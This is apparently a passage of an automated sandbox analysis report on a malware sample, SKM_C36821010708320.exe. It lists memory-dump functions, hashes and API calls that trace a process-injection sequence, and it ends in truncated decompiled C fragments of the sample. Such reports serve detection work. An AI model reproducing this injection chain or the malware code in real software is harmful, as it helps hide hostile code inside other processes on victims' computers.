Function 0524BAE8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0524BB48
GetCurrentThread.KERNEL32 ref: 0524BB85
GetCurrentProcess.KERNEL32 ref: 0524BBC2
GetCurrentThreadId.KERNEL32 ref: 0524BC1B

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bcead09973e128917332845f397cfc5f48730cc442e7643df9d56f8111502574
Instruction ID: c5088d8134f77305dd22a45d7e4eea7802cbce87bb5d8402a897ba5ce76c3dcb
Opcode Fuzzy Hash: bcead09973e128917332845f397cfc5f48730cc442e7643df9d56f8111502574
Instruction Fuzzy Hash: 805123B09106498FDB14DFAAD988B9EBBF4AF48314F20C459E419B7350DBB4A844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 060C8AD4, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060C8D16

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 44bfa206402079375e3eb7358e7842ff43465b9c4a27e484ef51f8dbaf8ebe2a
Instruction ID: 115b6498363d3b01d43fb94e9db445ca75cd6bb49c617b03077f80eb3b4e53f3
Opcode Fuzzy Hash: 44bfa206402079375e3eb7358e7842ff43465b9c4a27e484ef51f8dbaf8ebe2a
Instruction Fuzzy Hash: 9B915C71D00259DFDB90DFA4C8817EEBFB2BF48324F14856AE809A7240DB749985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 060C8AE0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060C8D16

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: df65f3e00f4098ded65532891325e8ef2a0c9ba809df47fb208cfad60a184985
Instruction ID: 6b40637917bd0468053d8c343209935cfb44f51b9d5ac4995a05868fe278be80
Opcode Fuzzy Hash: df65f3e00f4098ded65532891325e8ef2a0c9ba809df47fb208cfad60a184985
Instruction Fuzzy Hash: D4915C71D00219DFDB90DFA4C881BEEBFB2BF48324F14856AE809A7240DB749985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 052497F0, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 05249A36

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6238e1add79deecffb2c130e66583ab8d69c38baf97db4a2ad2a1ba6a99d574d
Instruction ID: 6a658c614a2a7e165b616b18d9468ebb5ab3b97d817ff45c86df12246617a07c
Opcode Fuzzy Hash: 6238e1add79deecffb2c130e66583ab8d69c38baf97db4a2ad2a1ba6a99d574d
Instruction Fuzzy Hash: B9712570A10B068FDB28DF6AD04579BBBF1BF88214F00892DD48AD7A40DB75E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 060C8850, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 060C88E8

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4d648d59764cfbd9355e791ff5690fd1b736888c752b3ae24eed0ecd6590b10c
Instruction ID: 8dc33a17a2f89a1b3dbed2bd212625e76e923b7d354fe347905cdd8580d87205
Opcode Fuzzy Hash: 4d648d59764cfbd9355e791ff5690fd1b736888c752b3ae24eed0ecd6590b10c
Instruction Fuzzy Hash: 0F2155719003499FCB40DFA9C884BEEBBF4FF48324F50842AE918A7240CB789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C8858, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 060C88E8

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 70ad440f777cc783ca0ccc7df977f7d3701e823aa986fcc11384d159721f6b56
Instruction ID: 12192301ebfdd7debad4642f348e0993f4b33f6cc09153a11125908863b0675b
Opcode Fuzzy Hash: 70ad440f777cc783ca0ccc7df977f7d3701e823aa986fcc11384d159721f6b56
Instruction Fuzzy Hash: 3B212671D003499FCB50DFA9C884BDEBBF5FF48324F50842AE918A7240DB789954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 060C8940, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060C89C8

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 20018a87ef345494e1c90c8187ca1e4268e3ad958312b41b3a068d942d4ecd57
Instruction ID: 80d531b7159c3388afdd1c35594167b887935ed682d66b22872372a37c934077
Opcode Fuzzy Hash: 20018a87ef345494e1c90c8187ca1e4268e3ad958312b41b3a068d942d4ecd57
Instruction Fuzzy Hash: CD214AB1C003499FCB10DFAAD844AEEBBF5FF48324F54842EE518A7240CB789914DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C86BB, Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 060C873E

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7ba3124972c39afd9d4321ea228d921b9419752c5240a83417929b5ec327bcf4
Instruction ID: ab5c4a74405e721148ac25a8a43c2d5c0cf107448a10b8b57bf9e5cd786de672
Opcode Fuzzy Hash: 7ba3124972c39afd9d4321ea228d921b9419752c5240a83417929b5ec327bcf4
Instruction Fuzzy Hash: 58213971D002089FDB50DFAAC4857EEBBF4AB48224F54842DD519A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0524BD08, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0524BD97

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7b3871c45870e98ab9c01c360ff4e256fd489a815b2a30a3427102f57b325c4d
Instruction ID: dae18d75e0058e15bf5e8039285933029e29869d54f3068413739e2f4fc2c19c
Opcode Fuzzy Hash: 7b3871c45870e98ab9c01c360ff4e256fd489a815b2a30a3427102f57b325c4d
Instruction Fuzzy Hash: 6F21E5B5901258AFDB10CFAAD884ADEBFF4EF48320F14845AE915A3310D778A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C86C0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 060C873E

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 4290829389feac504393d08ce5ffdb6b73802e53cf899604a4396c5939ea12e9
Instruction ID: ef750dbfe00d3ecbdbae650aab84285d8cde69ceea058b0ff710dea97bca8f73
Opcode Fuzzy Hash: 4290829389feac504393d08ce5ffdb6b73802e53cf899604a4396c5939ea12e9
Instruction Fuzzy Hash: 33213871D002088FDB50DFAAC4847EEBBF4AF48224F54C42ED519A7240DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C8948, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060C89C8

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b4681da6eb85b77622fcc2fe68477979bf255b6e2874c84ff7c912011e94e3b0
Instruction ID: 15c081af21daff8912a8fa0790771e3e7e2f6a9971841d43f16b19934410eb07
Opcode Fuzzy Hash: b4681da6eb85b77622fcc2fe68477979bf255b6e2874c84ff7c912011e94e3b0
Instruction Fuzzy Hash: D3212A71C002499FCB10DFAAC844ADEBBF5FF48324F54842EE518A7240C7799544CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05249228, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05249AB1,00000800,00000000,00000000), ref: 05249CC2

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 44f1ce944ff95f0975b81a4b0095fb09574c4e7f6e6ea40d6d79b25b65c580e2
Instruction ID: 17ec7bcccfd7ea3f499bd4a0d59712f70b8da17f95b8bc75624dec9cdcf5a911
Opcode Fuzzy Hash: 44f1ce944ff95f0975b81a4b0095fb09574c4e7f6e6ea40d6d79b25b65c580e2
Instruction Fuzzy Hash: 0C2179B28043898FCB10CFA9C844BDEBFF4AF59324F14845AE555AB310C3B5A444CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0524BD10, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0524BD97

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b47b2d1da2ab647640ab99cd9fa7a097cb13b0bb9f2affe4361517be4f243d87
Instruction ID: 4b58f39d11e9a55a34f2f80f3fbbecefe4bc830c800383b1290e7ccfc69ad6c0
Opcode Fuzzy Hash: b47b2d1da2ab647640ab99cd9fa7a097cb13b0bb9f2affe4361517be4f243d87
Instruction Fuzzy Hash: 8621E6B5900208DFDB10CFA9D884ADEBBF4FB48320F14845AE914A3310C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C8790, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060C8806

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cbce27861e6d5042cba834af48d8798bc213b74852793337492f3f55b5c350f0
Instruction ID: 8201165510876b8fcbfb23e4d1be9f357a19b59605b188d7ece1da11f0cb8326
Opcode Fuzzy Hash: cbce27861e6d5042cba834af48d8798bc213b74852793337492f3f55b5c350f0
Instruction Fuzzy Hash: C51156718042489FCB10DFAAD848BDFBFF5AB88324F14841AE915A7210CB75A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05249240, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05249AB1,00000800,00000000,00000000), ref: 05249CC2

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 03f0df37ffb767838ae21ed2338d89f7ff131e791b0e5fcff755505cfff25e1d
Instruction ID: 2450d20f1c4fdffdc773b22efa492dc61474e0ba13ea9ff8ac68c4ab61c5216e
Opcode Fuzzy Hash: 03f0df37ffb767838ae21ed2338d89f7ff131e791b0e5fcff755505cfff25e1d
Instruction Fuzzy Hash: 611103B29142499FCB14CFAAC444BDEBBF4AF98320F50842AE519A7200C3B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05249C50, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05249AB1,00000800,00000000,00000000), ref: 05249CC2

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f0fc0e7ddd192b0828e7f890c8222d22bd1b38d75683a5e98dc145398211753
Instruction ID: 8c43fe0f829a0df2b079b9d127404399a32cc325f0580a97c44b01b2a606b0c5
Opcode Fuzzy Hash: 6f0fc0e7ddd192b0828e7f890c8222d22bd1b38d75683a5e98dc145398211753
Instruction Fuzzy Hash: BB1103B68042499FCB14CFAAD848BDEFBF4AF88324F14851AE819A7210C775A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C8798, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060C8806

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d042976b41b2938df4c6a54fcbbb651e69511c4506c78e5b4aa5097cc38a6e78
Instruction ID: f04bfdfc037cf4bc45bd67251ab8fcd2429f677c3604bcf10df59ca55729cfba
Opcode Fuzzy Hash: d042976b41b2938df4c6a54fcbbb651e69511c4506c78e5b4aa5097cc38a6e78
Instruction Fuzzy Hash: A21123719002489BCB10DFAAD844BDEBFF5AB88324F24881AE515A7250CB79A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C8608, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 060C8672

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2613111cc19501a761c0d398df0cc85bc4b00c71f6e9dca31ce4929f0b988e13
Instruction ID: daac6f7178ffd4e784ce8806305061c6a8b9b17f9c95bcaf19f2cb3dad7d4ecb
Opcode Fuzzy Hash: 2613111cc19501a761c0d398df0cc85bc4b00c71f6e9dca31ce4929f0b988e13
Instruction Fuzzy Hash: 7E1158B1D043488BCB10DFAAC845BDFBFF4AB88228F24841DD519A7340CB79A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 060C8610, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 060C8672

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0ebd2661d6d76ff8c1498d2c0e8baed94277d5b96529fd82334c95c18b748f21
Instruction ID: 67a560d759509d4d334585af0be5319b4820efb10bc625dd98c0693812a84b38
Opcode Fuzzy Hash: 0ebd2661d6d76ff8c1498d2c0e8baed94277d5b96529fd82334c95c18b748f21
Instruction Fuzzy Hash: 581136B1D046488BCB10DFAAC8447DFFBF4AB88228F24841ED519A7340CB79A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 060CC8A0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 060CC8F8

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3393ebccaf4062a8b612c23180482b5fd9831bdd84512c37232046494f16fdd5
Instruction ID: 1da629e21980380645789aebcb6ff47b35787888be03250639076bf832240110
Opcode Fuzzy Hash: 3393ebccaf4062a8b612c23180482b5fd9831bdd84512c37232046494f16fdd5
Instruction Fuzzy Hash: 7A1115B5C003498FDB10DF99C549BDEBBF4EB48324F14845AE959A7340D778A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 052499D0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 05249A36

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c879510ccc2140c3d97ef89514dc0cdaf9c6d34ba268665a6c50f690abd05c56
Instruction ID: 656931c7989ecd981dd8b98d2bb70a2973ac64cd43eb9c586de61702a95e9f53
Opcode Fuzzy Hash: c879510ccc2140c3d97ef89514dc0cdaf9c6d34ba268665a6c50f690abd05c56
Instruction Fuzzy Hash: 4F1113B1C002598FCB20CF9AC444BDEFBF4AF88324F10841AD819B7200C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 060CB0D8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 060CB135

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9ec7369d54a85b4bca0ae8b08d87488ff6bb30edd84a2123bd90ae0f55bdb556
Instruction ID: b5cb11c1e8a135774fd16defdced8c7a672f76f399fd1c489af45e4279cfc333
Opcode Fuzzy Hash: 9ec7369d54a85b4bca0ae8b08d87488ff6bb30edd84a2123bd90ae0f55bdb556
Instruction Fuzzy Hash: 9E11E2B58003499FDB20DF9AD889BDEBFF8EB58324F50845AE914A7710C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009D9013, Relevance: 1.3, Instructions: 1297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.232723581.00000000009D2000.00000002.00020000.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.232688509.00000000009D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.232791570.0000000000A92000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e6eba12a943fd98d95da0c7179ab3039f295932481b3b849745b216b9aa92e
Instruction ID: bbc35cef1e8af6f6a98869f33360d67ae39d9d569cb5e62f0849d87fbb6d65cf
Opcode Fuzzy Hash: d6e6eba12a943fd98d95da0c7179ab3039f295932481b3b849745b216b9aa92e
Instruction Fuzzy Hash: A7A2466644E7C25FCB134B786DB52D17FB1AE27214B1E08C7C4C18F1A3D118699ADBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0524E8A0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ea7d114017321050ce9e0c7c4d7b8acb9ed62e1a0ba7e78a36e8448d907c0a
Instruction ID: 5e8de15cb5464f84c4a1b21173823d843bc65639fd84511a83c6d5a901ef73f2
Opcode Fuzzy Hash: a0ea7d114017321050ce9e0c7c4d7b8acb9ed62e1a0ba7e78a36e8448d907c0a
Instruction Fuzzy Hash: 2D1290F5CD17468AE3108F65ECD83E93BA1B7453A8BD2CB08D2612AAD0D7F4156ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 0524C62C, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2128f6e8d0b9124bb53e8f2700fd51d5850a92fa62d429927646470c34faa287
Instruction ID: e9e9dc15150a0c9c22bd9ada93e0de93081be4c9f2888dd80ff9d97ad35b2e0c
Opcode Fuzzy Hash: 2128f6e8d0b9124bb53e8f2700fd51d5850a92fa62d429927646470c34faa287
Instruction Fuzzy Hash: FAA16E72E1021ACFCF19DFA5C8445EEBBB2FF85300B15856AE905BB221DB71A955CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0524E890, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236218140.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b8bab74a9ae73902d74466b653d282fa6df3a185d8a48de2cd98a958a874eb
Instruction ID: 27af82fc6ffa123168f5e50898d1924728a5d91439f1dac51b885384ca293acb
Opcode Fuzzy Hash: e9b8bab74a9ae73902d74466b653d282fa6df3a185d8a48de2cd98a958a874eb
Instruction Fuzzy Hash: 70C1F7B1C917468AD710CF65ECC83E93BA1BB853A8F92CB18D1612B6D0D7F4146ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 060C0B18, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d135b86f7fdfde78ec2795c4bf3663768c7d7e1ed9fad7eff2e1ae99090ae0ff
Instruction ID: 348ae19b8d48e63c2573ad0ca72b0e70f2ac55b49a85914c7c3f390883d2fd44
Opcode Fuzzy Hash: d135b86f7fdfde78ec2795c4bf3663768c7d7e1ed9fad7eff2e1ae99090ae0ff
Instruction Fuzzy Hash: EB514F70A2420A8FD745EFB5E4A169EBFF3AB84214F00C92AE1059B364EF705909DF91

Uniqueness

Uniqueness Score: -1.00%

Function 060C0B28, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95252bfc7e4cf5690365ef4ccc3473d53b19f31bd379334e0604657711472f0
Instruction ID: bf2c0a4e5ec6f407c8d865fa42e46cbbbdd15f686b861c2d10cd9571b1e305e4
Opcode Fuzzy Hash: a95252bfc7e4cf5690365ef4ccc3473d53b19f31bd379334e0604657711472f0
Instruction Fuzzy Hash: 91515E70A2420A8FD745EFB5D49169EBBF3BF84214F00C92AE1059B364DF705909DF91

Uniqueness

Uniqueness Score: -1.00%

Function 060C0D80, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c5207fe7d5cea5de2661561baacde43f424e71a906ddc793b268ab3737cb90
Instruction ID: 278fab409dc66b857d31fdd342b5f271f79283669c2096abb0e5658625797c9a
Opcode Fuzzy Hash: 75c5207fe7d5cea5de2661561baacde43f424e71a906ddc793b268ab3737cb90
Instruction Fuzzy Hash: 5B516CB1E016588BEB58CF6BCD4068EFAF7AFC9310F14C5BA854DAB215EB3049858F15

Uniqueness

Uniqueness Score: -1.00%

Function 060C0D70, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238121904.00000000060C0000.00000040.00000001.sdmp, Offset: 060C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62968447f6622c1d0549aae702bb7363761b3366c04ef43e7c310932a9b79aef
Instruction ID: e2989d24381a3c46e5e33ac3ceee75a491aeb452fbf8678c88de6d96b020b25b
Opcode Fuzzy Hash: 62968447f6622c1d0549aae702bb7363761b3366c04ef43e7c310932a9b79aef
Instruction Fuzzy Hash: B94146B1E056588BEB5CCF6B8C4068EFAF7AFC9210F14C1BA850DAB215EB310545CF15

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SKM_C36821010708320.exe PID: 1928 Parent PID: 4740 SKM_C36821010708320.exeCOMMON

Executed Functions

Function 00419FD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419fd3
0x00419fdf
0x00419fe7
0x00419ff2
0x0041a00d
0x0041a015
0x0041a019

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015

Strings

2MA, xrefs: 00419FF2, 0041A000
2MA, xrefs: 0041A00D, 0041A014

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F20(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f2f
0x00419f37
0x00419f59
0x00419f6d
0x00419f71

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D

Strings

wKA, xrefs: 00419F59, 00419F64

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040ACC0(void* _a4, intOrPtr _a8) {
				void* _v3;
				intOrPtr _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				void* _v536;
				void* _t16;
				struct _OBJDIR_INFORMATION _t18;
				struct _OBJDIR_INFORMATION _t19;
				UNICODE_STRING* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_push(_a8);
				_t2 =  &_v12; // 0x81ec8b4d
				_t28 = _t2;
				_push(0x104);
				 *((intOrPtr*)(_t28 - 0x77)) =  *((intOrPtr*)(_t28 - 0x77)) + _t28;
				asm("cld");
				_t16 = E0041C810();
				_t33 = _t32 + 0xc;
				if(_t16 != 0) {
					_t18 = E0041CC30(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t18;
					if(_t18 != 0) {
						E0041CEB0( &_v12, 0);
